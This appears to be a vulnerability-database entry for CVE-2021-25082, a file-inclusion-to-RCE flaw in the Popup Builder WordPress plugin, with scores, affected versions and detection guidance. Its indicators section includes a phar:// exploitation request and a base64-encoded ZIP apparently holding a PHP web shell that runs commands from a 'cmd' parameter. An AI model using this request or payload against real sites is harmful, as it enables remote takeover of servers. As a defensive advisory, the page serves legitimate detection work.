cbcvebase.
CVE-2021-25082
published 2022-02-21

CVE-2021-25082: The Popup Builder WordPress plugin before 4.0.7 does not validate and sanitise the sgpb_type parameter before using it in a require statement, leading to a…

PriorityP276high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
5.37%
91.6th percentile
The Popup Builder WordPress plugin before 4.0.7 does not validate and sanitise the sgpb_type parameter before using it in a require statement, leading to a Local File Inclusion issue. Furthermore, since the beginning of the string can be controlled, the issue can lead to RCE vulnerability via wrappers such as PHAR

Affected

1 ranges
VendorProductVersion rangeFixed in
sygnoospopup_builder< 4.0.74.0.7

Detection & IOCsextracted from sources · hover to see the quote

filenamePopup.php
command/?sgpb_type=phar://wp-content/uploads/{{upload_year}}/{{upload_month}}/malicious.zip/&cmd=echo%20{{marker}}
bytes
UEsDBAoAAAAAAHINkVuOOgt7HwAAAB8AAAAJABwAUG9wdXAucGhwVVQJAAPHCkJpxwpCaXV4CwABBAAAAAAEAAAAADw/cGhwIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/PgpQSwECHgMKAAAAAAByDZFbjjoLex8AAAAfAAAACQAYAAAAAAABAAAApIEAAAAAUG9wdXAucGhwVVQFAAPHCkJpdXgLAAEEAAAAAAQAAAAAUEsFBgAAAAABAAEATwAAAGIAAAAAAA==
  • Look for GET requests to the WordPress root with the 'sgpb_type' parameter containing a 'phar://' wrapper, which is the exploitation vector for this LFI/RCE vulnerability.
  • Monitor for authenticated file uploads of ZIP archives to /wp-admin/async-upload.php followed shortly by requests using the 'sgpb_type' parameter referencing the uploaded file path via phar:// wrapper.
  • Detect the 'sgpb_type' parameter in HTTP requests containing path traversal or wrapper strings (e.g., 'phar://', 'php://') as indicators of exploitation attempts.
  • Check for the cookie 'wordpress_logged_in' in conjunction with the above upload and exploitation requests, as the attack requires authenticated access.
  • ·Exploitation requires the attacker to be authenticated (subscriber-level or higher) to upload the malicious ZIP file via the WordPress media uploader before triggering the PHAR wrapper via sgpb_type.
  • ·The vulnerability can be escalated from LFI to RCE only when the attacker can upload a PHAR-compatible archive (e.g., ZIP) to the server, which is possible via the WordPress media upload functionality for authenticated users.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.